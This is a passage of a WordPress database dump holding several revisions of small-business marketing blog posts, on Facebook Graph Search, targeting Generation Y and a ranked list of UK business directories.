08:27:36','2017-10-26 08:27:36',' \r\n\r\nFacebook Graph Search has been causing quite a bit of excitement among marketers.\r\n\r\nIts been around for a while if youve been trying out their beta version, and its recently rolled out to all US and UK account holders so now we can all take advantage of it.\r\n\r\nThe question is, will it be a help to small, local businesses? And, if so, how do we make the most of it?\r\n\r\nHere are a few answers.\r\n<h2>How being on Graph Search helps your Business</h2>\r\nGraph Search is Facebooks equivalent of a search engine. But it doesnt work in the way Google works.\r\n\r\nFacebook Graph Search is all about <b>personal recommendations</b>, so if youre looking for an Italian restaurant in Manchester, youll be shown Italian restaurants that the greater number of your friends, or connections to your friends, have been to, recommended or posted images of.\r\n\r\nHeres an example search Ive done:\r\n\r\n \r\n\r\nThe restaurants in the image above where at the top of my results and youll see that each of them have lots of likes.\r\n\r\nTherefore, getting lots of likes is going to be important “ well cover that a bit further down – but well also be offering advice on which are the other boxes your business needs to tick to have a chance of being shown on Graph Search.\r\n<h2>Choose the Right Category</h2>\r\n \r\n\r\nIf you havent yet set up your Business Page on Facebook Its important to get this one right from the start if you can, so that Facebook can decide where you fit in the grand scheme of things. Your category is the one Facebook uses to bring up your business details.\r\n\r\nLocal bricks and mortar stores will probably want Local Business or Place and purely online companies should go for Company, Organization or Institution.\r\n\r\nYoull be given a choice of category types when you click any of those category buttons. For example under Local Business or Place youll be presented with Food/Grocery, Book Store, Hotel and many more. Pick the one that most closely describes your business.\r\n\r\nIdea: If you cant find anything suitable from that list, select Local Business.\r\n\r\n \r\n\r\nNow enter your business contact details as accurately as you can and write it to match whats showing on your website. (If you make a mistake it can be changed later, though.) Again, Facebook uses your location when providing results on Graph Search.\r\n<h2>Have a great About section</h2>\r\n \r\n\r\nFacebook makes use of the About text to find the most relevant business for their Graph Search results, so follow these basic points:\r\n<ul>\r\n <li>В·Make it descriptive and to the point.</li>\r\n <li>В·Use a keyword or two that your customers are using to find your type of business (use <a href=\"http://adwords.google.co.uk/o/Targeting/Explorer?__u=1000000000&__c=1000000000&ideaRequestType=KEYWORD_IDEAS\">Google AdWords tool</a> or the free <a href=\"http://www.wordtracker.com/\">Wordtracker tool</a>).</li>\r\n <li>В·Dont stuff with keywords!</li>\r\n <li>В·Remember, your prospective customers will see it and hopefully be inspired to find out more about you, so it needs to be readable and present you in a great light.</li>\r\n <li>В·Add your website URL in there as well – thats a must.</li>\r\n</ul>\r\nNext youll be prompted to add a lovely picture of your business. Something professional taken on a sunny day will do wonders.\r\n\r\nThen create a Facebook Web Address, ie <a href=\"https://www.facebook.com/juicycaliforniafruit\">http://www.facebook.com/juicycaliforniafruit</a>\r\n\r\nAnd youre part of the way there.\r\n<h2>Mission Statement and Long Description</h2>\r\nOn your Business Page, click on the About button under your profile picture, and click the Edit button next to Basic Info.\r\n\r\n \r\n\r\nThis is the page that appears:\r\n\r\n \r\n\r\nFill in everything you can, including your Mission statement and Long Description.\r\n\r\nHeres a nice example of a business, <a href=\"https://www.facebook.com/MonteCristoBookshop/info\">The Monte Cristo Bookshop</a> who have used all the Long Description space to great effect:\r\n\r\n \r\n\r\nThat examples taken from the article <a href=\"http://www.andreavahl.com/facebook/4-inspiring-examples-of-an-engaging-facebook-about-page.php\">4 Inspiring Examples of an Engaging Facebook About Page</a> by Andrea Vahl and its well worth having a glance over for inspiration.\r\n<h2>Get More Likes</h2>\r\nAs we saw at the beginning, Likes count big time. Getting them is easier said than done, as you know. But here are a few of the best articles Ive come across with genuinely useful ideas for getting more likes.\r\n\r\nThe excellent <a href=\"http://theoatmeal.com/comics/facebook_likes\">Less Marketing Douchebaggery More Tanks</a> cartoon advises on a non-begging strategy.\r\n\r\n<a href=\"http://www.stateofsearch.com/ten-real-ways-to-get-more-facebook-likes/\">Ten *Real* Ways to Get More Facebook Likes</a> provides 10 actual, non-woolly examples of getting Likes.\r\n\r\n<a href=\"http://www.postplanner.com/9-surefire-ways-to-get-more-likes-on-your-facebook-page/\">9 Surefire Ways to Get More Likes on Your Facebook Page</a> also give tips and tricks you may not have thought of.\r\n<h2>Get More Check-Ins</h2>\r\nShow how popular your business is by encouraging check-ins. The more of these you get, the more likely it is youll appear in the Graph Search results.\r\n<h2>Photos Galore</h2>\r\nGraph Search makes it easy to search for images, therefore you should be posting lots of images, and encouraging your visitors to post them, too.\r\n\r\n \r\n\r\nYou see why its a good thing to have photos on Facebook?\r\n\r\nIdea: Run a competition for the best picture taken in or of your restaurant or shop and ask customers to tag your business in them.\r\n<h2>Summary</h2>\r\nThe Graph Search algorithm will change with time, as Facebook slowly but surely add new features to the platform and adjust the relative importance of each of them. And only time will tell what methods marketers are going to find the most successful in making the most of it.\r\n\r\nIf you follow the tips above, however, youre well on your way to getting seen in Facebook Graph Search.\r\n\r\nWe at Target Local will be keeping our eyes peeled and keeping our readers up to date with the latest in the ever-changing social media landscape. So sign up to receive future notifications and get in touch if youve any questions about how you can benefit from Facebook Graph Search.','How to Use Facebook Graph Search','','inherit','closed','closed','','22-revision-v1','','','2017-10-26 08:27:36','2017-10-26 08:27:36','',22,'http://www.dogstardesign.co.uk/22-revision-v1',0,'revision','',0),(26,1,'2017-10-26 08:30:31','2017-10-26 08:30:31','<h2>Small business and Gen Y</h2>\r\nGeneration Y, that slice of the population born from the late 1970s to the early 1990s (approximately) will form 75% of the workforce by 2025, according to a report by <a href=\"http://bpwfoundation.org/documents/uploads/YC_SummaryReport_Final.pdf\">BPW</a>.\r\n\r\nAs a small business, have you ever wondered if marketing campaigns are reaching them? They\'re our future management class and, although a weak economy may be holding many back at the moment, they\'ll be playing an ever more important part in purchasing decisions in future. In fact, according to Gen BuY they\'ll have more purchasing power by 2017 than any generation before them (reported in <a href=\"http://resources.bazaarvoice.com/rs/bazaarvoice/images/201202_Millennials_whitepaper.pdf\">Bazaar Voice</a>).\r\n\r\nDo boomers and generation X\'s really know how to market to these prospective customers?\r\n<h2>1. Gen Y are addicted to their technology</h2>\r\n \r\n\r\nThere are most likely more smartphones than human beings means that technology is <b>very</b> important these days and more so with those who have grown up with it. Technologies like the smartphone and iPad alongside social media apps mean that millions of connections are being made online every day. What’s key to getting Gen Y customers interested in your company is to get some of those connections for yourself\r\n<h2>2. Gen Y like</h2>\r\nTry to understand the kind of things that Gen Y are attracted to (and remember that these likes aren’t just for Gen Ys)!\r\n<ul>\r\n <li>Authenticity (look at the thinking behind <a href=\"http://www.imediaconnection.com/content/26354.asp\">Levis marketing stragies</a>). Stick to your guns and your origins, small business.</li>\r\n <li>Social responsibility (<a href=\"http://www.newworldofwork.co.uk/2010/11/13/gen-y-rewards-companies-that-take-corporate-social-responsibility-seriously/\">83% trust a company</a> more if they\'re socially/environmentally responsible). Give to your local community, help publicise charities.</li>\r\n <li>Low cost (yes, I know, not always compatible with social responsibility) (eg, H&M). Provide products at different price points, offer discounts.</li>\r\n <li>An experience (<a href=\"http://www.redbull.com/uk/en\">Red Bull</a> does this well). Bookshops, hold coffee mornings. Coffee shops, attract book groups.</li>\r\n <li>Fast if not an immediate service (Amazon is one of the most liked brands in this <a href=\"http://www.thedrum.com/news/2013/06/06/cadburys-pringles-coca-cola-and-walkers-top-poll-generation-y-s-favourite-brands\">survey</a>) Sort out your payment pages to make it as easy as possible to buy from you, and sort out your deliveries.</li>\r\n</ul>\r\n<h2>3. Gen Y trust strangers</h2>\r\nwell, strangers who appear to be experienced and educated, anyway.\r\n\r\nIn fact they <a href=\"http://resources.bazaarvoice.com/rs/bazaarvoice/images/201202_Millennials_whitepaper.pdf\">trust them more than they do their own family and friends</a> (just 51% / 49%) And they definitely trust the opinions of strangers over that of brands: 84% of Gen Y say reviews from the public influence their buying decisions to at least some degree. What this tells us is thatВ user-generated reviews are now a must.\r\n<h2>4. Gen Y use their phones to find out about a location before they go in</h2>\r\n \r\n\r\nThey\'ll check Foursquare, Yelp, TopTable and the like before they go through the door. So it makes sense to be on at least one or two of the biggest <a href=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/marketing-your-restaurant-with-mobile-apps/\">mobile apps</a> (and provide the great customer service that will mean you\'ll have lots of good reviews.)\r\n\r\nFor advice on replying to negative reviews which even the best companies get, have a read of the <a href=\"https://support.google.com/places/answer/184271?hl=en\">Google guidelines</a>\r\n<h2>5. Gen Y don\'t believe brands care about their opinions</h2>\r\nand there are many sites they don\'t trust. But there are some that they do in fact, 57% of <a href=\"http://newsroom.cisco.com/feature/1114851\">young people surveyed by Cisco</a> had certain websites that they trust.\r\n\r\nSo if you can show that you have integrity and authenticity, and, even better, if you show that you value Gen Y opinions by actively seeking them out, responding to them and acting on their suggestions from time to time, you may be successful in marketing to them.\r\n\r\nTo get to Gen Y, you need a presence on social media: Facebook at the very least (there are a billion people on there, so that\'s where you need to be too). Hold competitions asking them for their input in return for a prize, hold polls or surveys.\r\n<h2>6. Gen Y use social media to spread their dissatisfaction far and wide</h2>\r\nGen Y likes to make their likes and dislikes, complaints and compliments known online and they do a lot of this on social media and review sites. In a world where onlyВ <a href=\"http://www.convinceandconvert.com/social-media-monitoring/70-of-companies-ignore-customer-complaints-on-twitter/\">29% of Twitter complaints get answered</a>, millions of opportunities to turn Gen Y into loyal customers are being lost. And ignoring bad press can end up like thisВ <a href=\"http://www.slate.com/blogs/future_tense/2012/08/16/united_airlines_loses_10_year_old_girl_enters_social_media_hell.html\">United Airlines PR fail</a>.\r\n\r\n \r\n\r\nphoto credit: <a href=\"http://www.flickr.com/photos/girlontheles/6928438272/\">girl_onthe_les</a> via <a href=\"http://creativecommons.org/licenses/by-nc-nd/2.0/\">cc</a>\r\n\r\nTry separating customer service accounts from marketing accounts on Twitter like ASOS do with <a href=\"https://www.twitter.com/ASOS_Heretohelp\">@ASOS_HeretoHelp</a> and <a href=\"https://www.twitter.com/ASOS\">@ASOS</a>, and look at the conversations they’re having to see how well the company engages with customers.\r\n\r\nDelve into the psychology behind <a href=\"http://www.briansolis.com/2012/04/the-6-pillars-of-social-commerce-understanding-the-psychology-of-engagement/\">social commerce</a> proposed by Brian Solis to find out how to use social media effectively.\r\n<h2>Summary</h2>\r\nSome businesses need to appeal to as wide a market as possible, whereas others are more targeted to a particular age group. Treat Gen Y with respect, get to know where they live online, provide a good value product and you\'re well on your way to making loyal customers of them.','6 Reasons to Target Generation Y','','publish','closed','closed','','6-reasons-to-target-generation-y','','','2017-10-26 08:30:59','2017-10-26 08:30:59','',0,'http://www.dogstardesign.co.uk/?page_id=26',0,'page','',0),(27,1,'2017-10-26 08:30:31','2017-10-26 08:30:31','<h2>Small business and Gen Y</h2>\r\nGeneration Y, that slice of the population born from the late 1970s to the early 1990s (approximately) will form 75% of the workforce by 2025, according to a report by <a href=\"http://bpwfoundation.org/documents/uploads/YC_SummaryReport_Final.pdf\">BPW</a>.\r\n\r\nAs a small business, have you ever wondered if marketing campaigns are reaching them? They\'re our future management class and, although a weak economy may be holding many back at the moment, they\'ll be playing an ever more important part in purchasing decisions in future. In fact, according to Gen BuY they\'ll have more purchasing power by 2017 than any generation before them (reported in <a href=\"http://resources.bazaarvoice.com/rs/bazaarvoice/images/201202_Millennials_whitepaper.pdf\">Bazaar Voice</a>).\r\n\r\nDo boomers and generation X\'s really know how to market to these prospective customers?\r\n<h2>1. Gen Y are addicted to their technology</h2>\r\n<img class=\" wp-image-931 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/medium_4127100798.jpg\" alt=\"medium_4127100798\" width=\"448\" height=\"299\" />\r\n\r\nThere are most likely more smartphones than human beings means that technology is <b>very</b> important these days and more so with those who have grown up with it. Technologies like the smartphone and iPad alongside social media apps mean that millions of connections are being made online every day. What’s key to getting Gen Y customers interested in your company is to get some of those connections for yourself\r\n<h2>2. Gen Y like</h2>\r\nTry to understand the kind of things that Gen Y are attracted to (and remember that these likes aren’t just for Gen Ys)!\r\n<ul>\r\n <li>Authenticity (look at the thinking behind <a href=\"http://www.imediaconnection.com/content/26354.asp\">Levis marketing stragies</a>). Stick to your guns and your origins, small business.</li>\r\n <li>Social responsibility (<a href=\"http://www.newworldofwork.co.uk/2010/11/13/gen-y-rewards-companies-that-take-corporate-social-responsibility-seriously/\">83% trust a company</a> more if they\'re socially/environmentally responsible). Give to your local community, help publicise charities.</li>\r\n <li>Low cost (yes, I know, not always compatible with social responsibility) (eg, H&M). Provide products at different price points, offer discounts.</li>\r\n <li>An experience (<a href=\"http://www.redbull.com/uk/en\">Red Bull</a> does this well). Bookshops, hold coffee mornings. Coffee shops, attract book groups.</li>\r\n <li>Fast if not an immediate service (Amazon is one of the most liked brands in this <a href=\"http://www.thedrum.com/news/2013/06/06/cadburys-pringles-coca-cola-and-walkers-top-poll-generation-y-s-favourite-brands\">survey</a>) Sort out your payment pages to make it as easy as possible to buy from you, and sort out your deliveries.</li>\r\n</ul>\r\n<h2>3. Gen Y trust strangers</h2>\r\nwell, strangers who appear to be experienced and educated, anyway.\r\n\r\nIn fact they <a href=\"http://resources.bazaarvoice.com/rs/bazaarvoice/images/201202_Millennials_whitepaper.pdf\">trust them more than they do their own family and friends</a> (just 51% / 49%) And they definitely trust the opinions of strangers over that of brands: 84% of Gen Y say reviews from the public influence their buying decisions to at least some degree. What this tells us is thatВ user-generated reviews are now a must.\r\n<h2>4. Gen Y use their phones to find out about a location before they go in</h2>\r\n<img class=\" wp-image-935 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/medium_2907850098.jpg\" alt=\"medium_2907850098\" width=\"448\" height=\"298\" />\r\n\r\nThey\'ll check Foursquare, Yelp, TopTable and the like before they go through the door. So it makes sense to be on at least one or two of the biggest <a href=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/marketing-your-restaurant-with-mobile-apps/\">mobile apps</a> (and provide the great customer service that will mean you\'ll have lots of good reviews.)\r\n\r\nFor advice on replying to negative reviews which even the best companies get, have a read of the <a href=\"https://support.google.com/places/answer/184271?hl=en\">Google guidelines</a>\r\n<h2>5. Gen Y don\'t believe brands care about their opinions</h2>\r\nand there are many sites they don\'t trust. But there are some that they do in fact, 57% of <a href=\"http://newsroom.cisco.com/feature/1114851\">young people surveyed by Cisco</a> had certain websites that they trust.\r\n\r\nSo if you can show that you have integrity and authenticity, and, even better, if you show that you value Gen Y opinions by actively seeking them out, responding to them and acting on their suggestions from time to time, you may be successful in marketing to them.\r\n\r\nTo get to Gen Y, you need a presence on social media: Facebook at the very least (there are a billion people on there, so that\'s where you need to be too). Hold competitions asking them for their input in return for a prize, hold polls or surveys.\r\n<h2>6. Gen Y use social media to spread their dissatisfaction far and wide</h2>\r\nGen Y likes to make their likes and dislikes, complaints and compliments known online and they do a lot of this on social media and review sites. In a world where onlyВ <a href=\"http://www.convinceandconvert.com/social-media-monitoring/70-of-companies-ignore-customer-complaints-on-twitter/\">29% of Twitter complaints get answered</a>, millions of opportunities to turn Gen Y into loyal customers are being lost. And ignoring bad press can end up like thisВ <a href=\"http://www.slate.com/blogs/future_tense/2012/08/16/united_airlines_loses_10_year_old_girl_enters_social_media_hell.html\">United Airlines PR fail</a>.\r\n\r\n<img class=\"wp-image-929 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/medium_6928438272.jpg\" alt=\"medium_6928438272\" width=\"480\" height=\"320\" />\r\n\r\nphoto credit: <a href=\"http://www.flickr.com/photos/girlontheles/6928438272/\">girl_onthe_les</a> via <a href=\"http://creativecommons.org/licenses/by-nc-nd/2.0/\">cc</a>\r\n\r\nTry separating customer service accounts from marketing accounts on Twitter like ASOS do with <a href=\"https://www.twitter.com/ASOS_Heretohelp\">@ASOS_HeretoHelp</a> and <a href=\"https://www.twitter.com/ASOS\">@ASOS</a>, and look at the conversations they’re having to see how well the company engages with customers.\r\n\r\nDelve into the psychology behind <a href=\"http://www.briansolis.com/2012/04/the-6-pillars-of-social-commerce-understanding-the-psychology-of-engagement/\">social commerce</a> proposed by Brian Solis to find out how to use social media effectively.\r\n<h2>Summary</h2>\r\nSome businesses need to appeal to as wide a market as possible, whereas others are more targeted to a particular age group. Treat Gen Y with respect, get to know where they live online, provide a good value product and you\'re well on your way to making loyal customers of them.','6 Reasons to Target Generation Y','','inherit','closed','closed','','26-revision-v1','','','2017-10-26 08:30:31','2017-10-26 08:30:31','',26,'http://www.dogstardesign.co.uk/26-revision-v1',0,'revision','',0),(28,1,'2017-10-26 08:30:59','2017-10-26 08:30:59','<h2>Small business and Gen Y</h2>\r\nGeneration Y, that slice of the population born from the late 1970s to the early 1990s (approximately) will form 75% of the workforce by 2025, according to a report by <a href=\"http://bpwfoundation.org/documents/uploads/YC_SummaryReport_Final.pdf\">BPW</a>.\r\n\r\nAs a small business, have you ever wondered if marketing campaigns are reaching them? They\'re our future management class and, although a weak economy may be holding many back at the moment, they\'ll be playing an ever more important part in purchasing decisions in future. In fact, according to Gen BuY they\'ll have more purchasing power by 2017 than any generation before them (reported in <a href=\"http://resources.bazaarvoice.com/rs/bazaarvoice/images/201202_Millennials_whitepaper.pdf\">Bazaar Voice</a>).\r\n\r\nDo boomers and generation X\'s really know how to market to these prospective customers?\r\n<h2>1. Gen Y are addicted to their technology</h2>\r\n \r\n\r\nThere are most likely more smartphones than human beings means that technology is <b>very</b> important these days and more so with those who have grown up with it. Technologies like the smartphone and iPad alongside social media apps mean that millions of connections are being made online every day. What’s key to getting Gen Y customers interested in your company is to get some of those connections for yourself\r\n<h2>2. Gen Y like</h2>\r\nTry to understand the kind of things that Gen Y are attracted to (and remember that these likes aren’t just for Gen Ys)!\r\n<ul>\r\n <li>Authenticity (look at the thinking behind <a href=\"http://www.imediaconnection.com/content/26354.asp\">Levis marketing stragies</a>). Stick to your guns and your origins, small business.</li>\r\n <li>Social responsibility (<a href=\"http://www.newworldofwork.co.uk/2010/11/13/gen-y-rewards-companies-that-take-corporate-social-responsibility-seriously/\">83% trust a company</a> more if they\'re socially/environmentally responsible). Give to your local community, help publicise charities.</li>\r\n <li>Low cost (yes, I know, not always compatible with social responsibility) (eg, H&M). Provide products at different price points, offer discounts.</li>\r\n <li>An experience (<a href=\"http://www.redbull.com/uk/en\">Red Bull</a> does this well). Bookshops, hold coffee mornings. Coffee shops, attract book groups.</li>\r\n <li>Fast if not an immediate service (Amazon is one of the most liked brands in this <a href=\"http://www.thedrum.com/news/2013/06/06/cadburys-pringles-coca-cola-and-walkers-top-poll-generation-y-s-favourite-brands\">survey</a>) Sort out your payment pages to make it as easy as possible to buy from you, and sort out your deliveries.</li>\r\n</ul>\r\n<h2>3. Gen Y trust strangers</h2>\r\nwell, strangers who appear to be experienced and educated, anyway.\r\n\r\nIn fact they <a href=\"http://resources.bazaarvoice.com/rs/bazaarvoice/images/201202_Millennials_whitepaper.pdf\">trust them more than they do their own family and friends</a> (just 51% / 49%) And they definitely trust the opinions of strangers over that of brands: 84% of Gen Y say reviews from the public influence their buying decisions to at least some degree. What this tells us is thatВ user-generated reviews are now a must.\r\n<h2>4. Gen Y use their phones to find out about a location before they go in</h2>\r\n \r\n\r\nThey\'ll check Foursquare, Yelp, TopTable and the like before they go through the door. So it makes sense to be on at least one or two of the biggest <a href=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/marketing-your-restaurant-with-mobile-apps/\">mobile apps</a> (and provide the great customer service that will mean you\'ll have lots of good reviews.)\r\n\r\nFor advice on replying to negative reviews which even the best companies get, have a read of the <a href=\"https://support.google.com/places/answer/184271?hl=en\">Google guidelines</a>\r\n<h2>5. Gen Y don\'t believe brands care about their opinions</h2>\r\nand there are many sites they don\'t trust. But there are some that they do in fact, 57% of <a href=\"http://newsroom.cisco.com/feature/1114851\">young people surveyed by Cisco</a> had certain websites that they trust.\r\n\r\nSo if you can show that you have integrity and authenticity, and, even better, if you show that you value Gen Y opinions by actively seeking them out, responding to them and acting on their suggestions from time to time, you may be successful in marketing to them.\r\n\r\nTo get to Gen Y, you need a presence on social media: Facebook at the very least (there are a billion people on there, so that\'s where you need to be too). Hold competitions asking them for their input in return for a prize, hold polls or surveys.\r\n<h2>6. Gen Y use social media to spread their dissatisfaction far and wide</h2>\r\nGen Y likes to make their likes and dislikes, complaints and compliments known online and they do a lot of this on social media and review sites. In a world where onlyВ <a href=\"http://www.convinceandconvert.com/social-media-monitoring/70-of-companies-ignore-customer-complaints-on-twitter/\">29% of Twitter complaints get answered</a>, millions of opportunities to turn Gen Y into loyal customers are being lost. And ignoring bad press can end up like thisВ <a href=\"http://www.slate.com/blogs/future_tense/2012/08/16/united_airlines_loses_10_year_old_girl_enters_social_media_hell.html\">United Airlines PR fail</a>.\r\n\r\n \r\n\r\nphoto credit: <a href=\"http://www.flickr.com/photos/girlontheles/6928438272/\">girl_onthe_les</a> via <a href=\"http://creativecommons.org/licenses/by-nc-nd/2.0/\">cc</a>\r\n\r\nTry separating customer service accounts from marketing accounts on Twitter like ASOS do with <a href=\"https://www.twitter.com/ASOS_Heretohelp\">@ASOS_HeretoHelp</a> and <a href=\"https://www.twitter.com/ASOS\">@ASOS</a>, and look at the conversations they’re having to see how well the company engages with customers.\r\n\r\nDelve into the psychology behind <a href=\"http://www.briansolis.com/2012/04/the-6-pillars-of-social-commerce-understanding-the-psychology-of-engagement/\">social commerce</a> proposed by Brian Solis to find out how to use social media effectively.\r\n<h2>Summary</h2>\r\nSome businesses need to appeal to as wide a market as possible, whereas others are more targeted to a particular age group. Treat Gen Y with respect, get to know where they live online, provide a good value product and you\'re well on your way to making loyal customers of them.','6 Reasons to Target Generation Y','','inherit','closed','closed','','26-revision-v1','','','2017-10-26 08:30:59','2017-10-26 08:30:59','',26,'http://www.dogstardesign.co.uk/26-revision-v1',0,'revision','',0),(29,1,'2017-10-26 08:32:06','2017-10-26 08:32:06','Over the last two years Google has been killing off link and web directories and it doesnt look like local business directories are having a good time either. Below are list of top 50 online UK business directories ordered by search traffic. Its amazing that some of these sites are still in business.\r\n<h3><a href=\"http://www.yelp.co.uk/\">Yelp</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/yelp.co_.uk_.png\" alt=\"Yelp Search Traffic\" />\r\n<h3><a href=\"http://www.yell.com/\">Yell</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/yell.com_.png\" alt=\"Yell Search Traffic\" />\r\n<h3><a href=\"http://www.qype.co.uk/\">Qype</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/qype.co_.uk_.png\" alt=\"Qype Search Traffic\" />\r\n<h3><a href=\"https://foursquare.com/\">Foursquare</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/foursquare.com_.png\" alt=\"Foursquare Search Traffic\" />\r\n<h3><a href=\"http://www.localstore.co.uk/\">Local Store</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/localstore.co_.uk_.png\" alt=\"Local Store Search Traffic\" />\r\n<h3><a href=\"http://www.4ni.co.uk/\">4NI</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/4ni.co_.uk_.png\" alt=\"4NI Search Traffic\" />\r\n<h3><a href=\"http://www.britinfo.net/\">Britinfo</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/britinfo.net_.png\" alt=\"Britinfo.net Search Traffic\" />\r\n<h3><a href=\"http://www.thomsonlocal.com/\">Thomson Local</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/thomsonlocal.com_.png\" alt=\"Thomson Local Search Traffic\" />\r\n<h3><a href=\"http://www.118.com\">118.com</a></h3>\r\n<img class=\"aligncenter size-full wp-image-1700\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/118_com.png\" alt=\"118_com\" width=\"944\" height=\"329\" />\r\n<h3><a href=\"http://www.theargus.co.uk/trade_director/\">The Argus Trade Directory</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/theargus.co_.uk_.png\" alt=\"The Argus Trade Directory Search Traffic\" />\r\n<h3><a href=\"http://here.com/\">Here Maps by Nokia</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/here.com_.png\" alt=\"Here Maps by Nokia Search Traffic\" />\r\n<h3><a href=\"http://www.opendi.co.uk/\">Opendi</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/opendi.co_.uk_.png\" alt=\"Opendi Search Traffic\" />\r\n<h3><a href=\"http://www.freeindex.co.uk/\">Free Index</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/freeindex.co_.uk_.png\" alt=\"Free Index Search Traffic\" />\r\n<h3><a href=\"http://www.cylex-uk.co.uk/\">Cylex</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/cylex-uk.co_.uk_.png\" alt=\"Cylex Search Traffic\" />\r\n<h3><a href=\"http://www.misterwhat.co.uk/\">Mister What</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/misterwhat.co_.uk_.png\" alt=\"MisterWhat Search Traffic\" />\r\n<h3><a href=\"http://www.yalwa.co.uk/\">Yalw</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/yalwa.co_.uk_.png\" alt=\"Yalw Search Traffic\" />\r\n<h3><a href=\"http://www.ukdirectory.co.uk/\">UK Directory </a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/ukdirectory.co_.uk_.png\" alt=\"UK Directory Search Traffic\" />\r\n<h3><a href=\"http://www.applegate.co.uk/\">Applegate</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/applegate.co_.uk_.png\" alt=\"Applegate Search Traffic\" />\r\n<h3><a href=\"http://www.lacartes.com/\">Lacartes</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/lacartes.com_.png\" alt=\"Lacartes Search Traffic\" />\r\n<h3><a href=\"http://www.locallife.co.uk/\">Local Business Listings UK</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/locallife.co_.uk_.png\" alt=\"Local Business Listings UK Search Traffic\" />\r\n<h3><a href=\"http://ukplaces.com/\">UK Places</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/ukplaces.com_.png\" alt=\"Ukplaces.com Search Traffic\" />\r\n<h3><a href=\"http://www.finder.co.uk/\">Finder</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/finder.co_.uk_.png\" alt=\"Finder Search Traffic\" />\r\n<h3><a href=\"http://www.hotfrog.co.uk/\">Hotfrog</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/hotfrog.co_.uk_.png\" alt=\"Hotfrog Search Traffic\" />\r\n<h3><a href=\"http://www.localdatasearch.com/\">The local Data Search</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/localdatasearch.com_.png\" alt=\"The local Data Search Search Traffic\" />\r\n<h3><a href=\"http://www.colourpages.com/\">Colour Pages</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/colourpages.com_.png\" alt=\"Colourpages.com Search Traffic\" />\r\n<h3><a href=\"http://www.mylocalservices.co.uk/\">My Local Services</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/mylocalservices.co_.uk_.png\" alt=\"My Local Services Search Traffic\" />\r\n<h3><a href=\"http://www.scoot.co.uk/\">Scoot</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/scoot.co_.uk_.png\" alt=\"Scoot Search Traffic\" />\r\n<h3><a href=\"http://www.business-directory-uk.co.uk/\">Business Directory UK</a></h3>\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/business-directory-uk.co_.uk_.png\" alt=\"Business 